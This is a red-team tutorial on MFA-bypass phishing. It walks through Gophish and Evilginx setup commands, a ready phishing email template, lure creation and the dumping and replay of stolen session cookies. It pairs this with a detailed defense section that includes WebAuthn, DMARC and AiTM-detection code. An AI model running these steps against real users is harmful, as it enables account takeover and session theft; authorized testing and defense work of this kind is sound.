Phishing and Initial Access Tradecraft for Authorized Red Teams


Legal & ethical disclaimer. Everything below is for education and authorized engagements only. Phishing real users without a signed Rules of Engagement (RoE) and explicit written scope is a crime in most jurisdictions. Run all infrastructure against accounts and domains you own or are contractually authorized to target. When in doubt, stop and ask your point of contact.

Introduction / Overview

Phishing remains the most reliable initial-access vector on modern red-team engagements. Endpoints are hardened, EDR is everywhere, and external services are patched — but humans still click. The interesting shift over the last few years is MFA: classic credential capture is mostly dead because a stolen password alone rarely lets you in. Adversary-in-the-middle (AiTM) tooling like Evilginx changed that by stealing the authenticated session cookie instead of the password, defeating most app-based and OTP MFA.

This article walks through the full initial-access chain a red team uses under authorization: building a pretext, standing up a Gophish campaign for tracking and payload delivery, and using Evilginx for MFA phishing. We finish with an equally detailed Detection & Defense section, because half of this job is making sure the blue team can see you.

This maps to MITRE ATT&CK T1566 (Phishing), T1566.002 (Spearphishing Link), and T1621 / T1111 (MFA interception).

How it works / Background

Two delivery models dominate authorized campaigns:

  1. Credential / session harvesting (AiTM). The target clicks a link to your reverse-proxy phishlet. Evilginx transparently proxies the real login page (e.g. login.microsoftonline.com), so the victim completes MFA against the genuine IdP. Evilginx captures the resulting session token. You import that cookie and you are authenticated — no password replay, no second factor required.

  2. Payload delivery. The link or attachment drops a loader (an HTA, signed LNK, ISO/IMG container, or a macro-free Office payload) that calls back to your C2. Gophish handles the email, the tracking pixel, the landing page, and click telemetry.

The critical concept is the pretext: the believable story that makes the target act. A good pretext aligns sender identity, timing, and a plausible call to action — an "IT password expiry," a "DocuSign for HR," a "shared Teams file." Tradecraft is 80% pretext quality and lookalike domain hygiene, 20% tooling.

Prerequisites / Lab setup

Build this in an isolated lab with test tenants and throwaway domains. Never test phishlets against production identity providers you do not own.

  • A cheap VPS (Debian/Ubuntu) with ports 80/443 reachable.
  • A registered lookalike domain plus DNS control (A records pointing at the VPS).
  • TLS certificates — Evilginx issues Let's Encrypt certs automatically; Gophish can use its own.
  • A test M365 / Okta tenant for MFA experiments.

Install Gophish:

wget https://github.com/gophish/gophish/releases/download/v0.12.1/gophish-v0.12.1-linux-64bit.zip
unzip gophish-v0.12.1-linux-64bit.zip -d gophish && cd gophish
# Make sure the admin UI is bound to localhost only (the shipped default); reach it over an SSH tunnel.
# The original sed replaced 127.0.0.1 with itself, so it never changed anything.
sed -i 's/0.0.0.0:3333/127.0.0.1:3333/' config.json
./gophish

On first run Gophish prints a randomly generated admin password to stdout (this replaced the old gophish/gophish default). Reach the admin panel via ssh -L 3333:127.0.0.1:3333 user@vps rather than exposing it.

Install Evilginx (v3, the maintained fork):

git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2 && make
sudo ./build/evilginx -p ./phishlets

Walkthrough / PoC

1. Sender infrastructure and reputation

Cold domains land in spam. Warm them: configure SPF, DKIM, and DMARC for your sending domain so the message authenticates, then check placement before the real send.

# Verify your sending domain's auth records resolve correctly.
dig +short TXT _dmarc.your-lookalike-domain.test
dig +short TXT default._domainkey.your-lookalike-domain.test

In Gophish, create a Sending Profile (SMTP host, from-address matching your pretext), an Email Template (with {{.FirstName}} and a tracked {{.URL}} link), and a Landing Page. Always test against your own seed accounts first.

2. Pretext and template

Keep it short and operational. A login-redirect pretext that pairs with Evilginx:

Subject: [Action Required] Re-authenticate your Microsoft 365 session

Hi {{.FirstName}},

Our records show your session for {{.Position}} expires today. Please
re-confirm access to avoid interruption:

  {{.URL}}

— IT Service Desk

The {{.URL}} points at the Evilginx lure, not the Gophish landing page, when you are doing session theft.

3. Evilginx MFA phishing

Configure Evilginx's domain and external IP, then enable a phishlet and create a lure:

: config domain your-lookalike-domain.test
: config ipv4 external <VPS_PUBLIC_IP>
: phishlets hostname o365 login.your-lookalike-domain.test
: phishlets enable o365
: lures create o365
: lures get-url 0

lures get-url 0 returns the link you deliver via Gophish. When the target authenticates — including MFA — Evilginx logs the captured session:

: sessions          # list captured sessions
: sessions 1        # dump tokens/cookies for session 1

Import the cookie JSON into a clean browser profile (e.g. the Cookie-Editor extension) and you load straight into the authenticated mailbox, MFA already satisfied. Note that phishing-resistant FIDO2/passkeys break this attack — Evilginx cannot proxy a WebAuthn assertion bound to the real origin.

4. Payload delivery variant

If the goal is execution rather than session theft, host a loader and reference it from the landing page. A common modern delivery is a signed .lnk inside an ISO (defeats Mark-of-the-Web on extracted contents). Track opens and clicks in the Gophish dashboard, then correlate first callback in your C2. See building C2 redirectors for keeping that infrastructure resilient, and OPSEC for red-team infra for domain categorization and TLS hygiene.

Mermaid diagram

[Diagram 1: the phishing chain from delivery and click through to MFA]

The flow shows that delivery and click are necessary but FIDO2/passkeys are the decision point where the whole chain collapses.

Detection & Defense (Blue Team)

Defense here matters as much as the offense — these controls are what you recommend in the report.

Identity hardening (highest impact).

  • Deploy phishing-resistant MFA: FIDO2 security keys or platform passkeys. WebAuthn binds the credential to the legitimate origin, so an AiTM proxy on a lookalike domain cannot relay the assertion. This single control neutralizes Evilginx-class attacks.
  • Enforce Conditional Access with token binding / token protection and compliant-device requirements. Microsoft Entra's token protection and CAE (Continuous Access Evaluation) shorten the window a stolen cookie is usable.
  • Watch for impossible-travel and anomalous sign-ins (UEBA / Entra ID Protection risk events) — a session replayed from operator infrastructure often trips geo/ASN anomalies.
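
The origin check in the first bullet is worth seeing in code. The following is an added example, not code from the article or from any IdP: it builds the clientDataJSON a browser produces for a WebAuthn assertion and runs the relying-party checks (ceremony type, challenge, origin). The expected origin, the challenge and the lookalike host are constructed values. Because the authenticator signs over authenticatorData plus the SHA-256 of clientDataJSON, a proxy on a lookalike domain cannot rewrite the origin without invalidating the signature, which is why the assertion relayed from the lookalike fails.

```python
import base64
import hashlib
import json

# Origin the genuine IdP registered as its relying party (constructed for this example).
EXPECTED_ORIGIN = "https://login.microsoftonline.com"


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_client_data(origin: str, challenge: bytes) -> str:
    """Constructed clientDataJSON as the browser builds it for the page that called
    navigator.credentials.get(): the browser, not the page, fills in the origin."""
    payload = {"type": "webauthn.get", "challenge": b64url_encode(challenge),
               "origin": origin, "crossOrigin": False}
    return b64url_encode(json.dumps(payload).encode())


def client_data_hash(client_data_b64: str) -> str:
    """The authenticator signs authenticatorData || SHA-256(clientDataJSON), so the
    origin field is covered by the signature and cannot be rewritten in transit."""
    return hashlib.sha256(b64url_decode(client_data_b64)).hexdigest()


def verify_client_data(client_data_b64: str, expected_challenge: bytes,
                       expected_origin: str = EXPECTED_ORIGIN) -> tuple[bool, str]:
    """Origin and challenge checks the relying party runs before verifying the signature
    (a real RP also checks the rpIdHash inside authenticatorData)."""
    data = json.loads(b64url_decode(client_data_b64))
    if data.get("type") != "webauthn.get":
        return False, "unexpected ceremony type"
    if b64url_decode(data.get("challenge", "")) != expected_challenge:
        return False, "challenge does not match the one issued"
    if data.get("origin") != expected_origin:
        return False, f"origin {data.get('origin')!r} is not {expected_origin!r}"
    return True, "ok"


if __name__ == "__main__":
    challenge = b"constructed-challenge-0123456789"
    genuine = make_client_data(EXPECTED_ORIGIN, challenge)
    proxied = make_client_data("https://login.your-lookalike-domain.test", challenge)
    print(verify_client_data(genuine, challenge))
    print(verify_client_data(proxied, challenge))
```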

Email and link defenses.

  • Publish DMARC p=reject for your own domains and enforce DMARC on inbound mail, so that messages spoofing your display domain fail DKIM/SPF alignment and are rejected.
  • Detect lookalike / newly-registered domains with brand-monitoring and DNS feeds; new domains and homoglyphs are strong signals.
  • Use mail-flow link rewriting / detonation (Defender for Office 365 Safe Links, Proofpoint URL Defense) to sandbox destinations at click time.
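
As an added example (not part of the original article), a small evaluator for the DMARC record that the dig query in the walkthrough returns: it parses the TXT record into tags and lists the settings that still let a spoofed From domain through, so you can compare a weak record with an enforcing one. Both records below are constructed.

```python
def parse_dmarc(record: str) -> dict[str, str]:
    """Split a DMARC TXT record (as returned by dig +short TXT _dmarc.<domain>) into tags."""
    tags = {}
    for part in record.strip().strip('"').split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def dmarc_findings(record: str) -> list[str]:
    """Return the weaknesses that let spoofed mail through; an empty list means an enforcing policy."""
    t = parse_dmarc(record)
    if t.get("v", "").upper() != "DMARC1":
        return ["not a DMARC record (missing v=DMARC1)"]
    findings = []
    policy = t.get("p", "")
    if policy != "reject":
        findings.append(f"p={policy or 'missing'}: receivers do not reject mail that fails alignment")
    subpolicy = t.get("sp", policy)  # sp= defaults to p= when absent
    if subpolicy != "reject":
        findings.append(f"sp={subpolicy or 'missing'}: subdomains inherit a non-rejecting policy")
    pct = t.get("pct", "100")
    if not pct.isdigit() or int(pct) < 100:
        findings.append(f"pct={pct}: policy is applied to only part of the failing mail")
    if t.get("adkim", "r") != "s" or t.get("aspf", "r") != "s":
        findings.append("adkim/aspf relaxed: any subdomain of the From domain counts as aligned")
    if "rua" not in t:
        findings.append("no rua=: you receive no aggregate reports of spoofing attempts")
    return findings


# Constructed records for a weak and an enforcing configuration of the same domain.
WEAK_RECORD = '"v=DMARC1; p=none; pct=50"'
STRONG_RECORD = '"v=DMARC1; p=reject; sp=reject; pct=100; adkim=s; aspf=s; rua=mailto:dmarc@corp.test"'

if __name__ == "__main__":
    for name, rec in (("weak", WEAK_RECORD), ("strong", STRONG_RECORD)):
        print(name, dmarc_findings(rec) or ["enforcing"])
```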

Network and endpoint.

  • Hunt for Evilginx artifacts: the reverse proxy typically presents a single, freshly issued Let's Encrypt certificate for a lookalike host that fronts a known IdP login page, and proxied auth flows produce Referer/Origin mismatches. Logging User-Agent and source ASN at the IdP helps.
  • Apply Mark-of-the-Web enforcement and block ISO/IMG/LNK auto-mount via ASR rules (e.g. Block execution of potentially obfuscated scripts, Block executable content from email and webmail).
  • Map alerts to ATT&CK T1566.002 and T1621 in your SIEM for coverage tracking.
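
The ASN and session-replay signals from the identity and network bullets above, turned into detection logic as an added example (not code from the article or from any SIEM vendor). The sign-in records and the per-user ASN baseline are constructed and only loosely modelled on IdP sign-in logs; the two rules are: MFA completed from an ASN the user has never signed in from (in an AiTM flow the proxy, not the user, talks to the IdP), and the same session id later used from a different ASN or user agent (the captured cookie being replayed). Alerts carry the ATT&CK IDs the article maps.

```python
import json

# Constructed, simplified sign-in records (not a real Entra export): time, user,
# session id, source IP and ASN, user agent, result, and whether MFA was satisfied.
SAMPLE_LOG = """
{"time":"2024-05-01T08:02:10Z","user":"alice@corp.test","sessionId":"s-111","ip":"203.0.113.10","asn":"AS64501 CorpISP","ua":"Edge/124 Windows","result":"success","mfa":true}
{"time":"2024-05-01T09:15:44Z","user":"alice@corp.test","sessionId":"s-222","ip":"198.51.100.7","asn":"AS64510 CloudVPS","ua":"Edge/124 Windows","result":"success","mfa":true}
{"time":"2024-05-01T09:21:03Z","user":"alice@corp.test","sessionId":"s-222","ip":"192.0.2.55","asn":"AS64520 OtherVPS","ua":"Firefox/125 Linux","result":"success","mfa":false}
{"time":"2024-05-01T10:00:00Z","user":"bob@corp.test","sessionId":"s-333","ip":"203.0.113.22","asn":"AS64501 CorpISP","ua":"Chrome/124 macOS","result":"success","mfa":true}
"""

# Constructed baseline: ASNs each user has signed in from over the trusted history window.
KNOWN_ASN = {"alice@corp.test": {"AS64501 CorpISP"}, "bob@corp.test": {"AS64501 CorpISP"}}


def parse_log(text: str) -> list[dict]:
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def detect_aitm(events: list[dict], known_asn: dict[str, set[str]]) -> list[dict]:
    """Run the two AiTM checks over successful sign-ins in time order and return alerts."""
    alerts = []
    established = {}  # sessionId -> the event that first established that session
    for e in sorted(events, key=lambda ev: ev["time"]):
        if e["result"] != "success":
            continue
        # Rule 1: MFA satisfied from an ASN outside the user's baseline (proxy infrastructure).
        if e["mfa"] and e["asn"] not in known_asn.get(e["user"], set()):
            alerts.append({"rule": "mfa_from_unfamiliar_asn", "attack": "T1566.002",
                           "user": e["user"], "sessionId": e["sessionId"], "asn": e["asn"]})
        # Rule 2: an existing session shows up from a new ASN or user agent (cookie replay).
        first = established.setdefault(e["sessionId"], e)
        if first is not e and (first["asn"] != e["asn"] or first["ua"] != e["ua"]):
            alerts.append({"rule": "session_reused_from_new_asn_or_ua", "attack": "T1111",
                           "user": e["user"], "sessionId": e["sessionId"],
                           "from": [first["asn"], first["ua"]], "to": [e["asn"], e["ua"]]})
    return alerts


if __name__ == "__main__":
    for alert in detect_aitm(parse_log(SAMPLE_LOG), KNOWN_ASN):
        print(json.dumps(alert))
```

Only alice's s-222 session trips both rules: the MFA sign-in came from a hosting ASN she had never used, and the same session was then presented from a second ASN with a different browser.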

Human layer.

  • Run authorized, debriefed phishing simulations and report-phish buttons; measure report rate, not just click rate. A high report rate is a better metric than a low click rate.

For deeper SIEM correlation patterns, see hunting AiTM sessions in Entra logs.

Conclusion

Modern phishing tradecraft has moved from password theft to session theft. Gophish gives you reliable delivery and telemetry; Evilginx defeats OTP and push MFA by proxying the genuine IdP and stealing the resulting cookie. The defensive takeaway is unambiguous: phishing-resistant FIDO2/passkeys plus token protection break the chain entirely, and DMARC, lookalike-domain monitoring, and Safe-Links raise the cost of every earlier stage. A good engagement report sells those controls as hard as it demonstrates the attack.
